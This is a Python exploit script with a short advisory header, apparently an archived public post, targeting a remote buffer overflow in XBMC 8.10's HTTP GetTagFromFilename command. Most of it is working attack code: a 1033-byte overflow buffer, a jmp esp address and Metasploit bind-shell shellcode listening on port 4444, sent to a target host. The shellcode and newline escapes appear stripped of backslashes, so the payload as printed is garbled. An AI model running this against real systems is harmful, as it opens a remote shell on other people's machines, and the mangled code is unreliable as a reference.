#!/usr/bin/env python 
'''
Xbmc get tag from file name request remote buffer overflow 8.10 !!! 
 
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/ 
 
versions affected: 
Linux windows < tested 
other versions are also possibly affected. 
Release date:April the 1st 2009 

Restrictions:No filtering needed.
This exploit happens when parsing and overly long id3
tag to the web server.Dont think i covered this much
in the poc code as i was running out of time on this
exploit.


We are able to overwrite the exception handlers also so 
creating a reliable exploit for vista and xps3 shouldn't 
be to hard have a look there are some modules loaded with 
out /safe seh. 

Credits to n00b for finding the buffer overflow and writing 
poc code and exploit.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''


import sys, socket 
import struct

port = 80 
host = sys.argv[1] 

Start_url ='xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/'
Junk_buffer = 'A'*1033
Jump_esp = struct.pack('<L',0x77F84143)

Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx58"
"x4ex36x46x32x46x32x4bx48x45x34x4ex53x4bx58x4ex37"
"x45x30x4ax47x41x30x4fx4ex4bx58x4fx44x4ax51x4bx58"
"x4fx45x42x52x41x30x4bx4ex49x44x4bx48x46x33x4bx58"
"x41x50x50x4ex41x53x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x35x46x32x4ax32x45x47x45x4ex4bx48"
"x4fx55x46x52x41x30x4bx4ex48x46x4bx58x4ex50x4bx54"
"x4bx48x4fx35x4ex31x41x50x4bx4ex43x50x4ex32x4bx38"
"x49x48x4ex36x46x32x4ex31x41x36x43x4cx41x53x4bx4d"
"x46x46x4bx48x43x44x42x53x4bx38x42x34x4ex30x4bx38"
"x42x47x4ex41x4dx4ax4bx48x42x34x4ax50x50x45x4ax36"
"x50x58x50x34x50x30x4ex4ex42x45x4fx4fx48x4dx48x36"
"x43x35x48x36x4ax46x43x33x44x53x4ax46x47x37x43x37"
"x44x53x4fx45x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
"x4ex4fx4bx33x42x35x4fx4fx48x4dx4fx55x49x38x45x4e"
"x48x56x41x48x4dx4ex4ax30x44x30x45x45x4cx36x44x50"
"x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x35"
"x4fx4fx48x4dx43x35x43x55x43x55x43x55x43x55x43x34"
"x43x35x43x34x43x45x4fx4fx42x4dx48x56x4ax46x41x51"
"x4ex45x48x36x43x35x49x58x41x4ex45x59x4ax46x46x4a"
"x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x41"
"x41x55x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x52"
"x49x4ex47x55x4fx4fx48x4dx43x45x45x45x4fx4fx42x4d"
"x4ax46x45x4ex49x44x48x58x49x44x47x55x4fx4fx48x4d"
"x42x35x46x45x46x35x45x55x4fx4fx42x4dx43x39x4ax46"
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x45"
"x4fx4fx42x4dx48x46x4cx46x46x56x48x56x4ax36x43x46"
"x4dx56x49x48x45x4ex4cx46x42x35x49x35x49x32x4ex4c"
"x49x48x47x4ex4cx56x46x54x49x48x44x4ex41x53x42x4c"
"x43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x34x4ex52"
"x43x59x4dx48x4cx47x4ax53x4bx4ax4bx4ax4bx4ax4ax36"
"x44x37x50x4fx43x4bx48x41x4fx4fx45x57x46x54x4fx4f"
"x48x4dx4bx35x47x45x44x45x41x55x41x35x41x45x4cx36"
"x41x30x41x55x41x35x45x45x41x35x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"
"x43x48x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax36x42x4fx4cx48x46x30x4fx45x43x35x4fx4fx48x4d"
"x4fx4fx42x4dx5a"

)

End_url ='.mp3)'

# create a socket object called 'c' 
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# connect to the socket 
c.connect((host, port)) 

Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)

# create a file-like object to read 
fileobj = c.makefile('r', 0) 

# Ask the server for the file 
fileobj.write("GET /"+Request+" HTTP/1.1nn") 

# www.Syue.com [2009-04-01]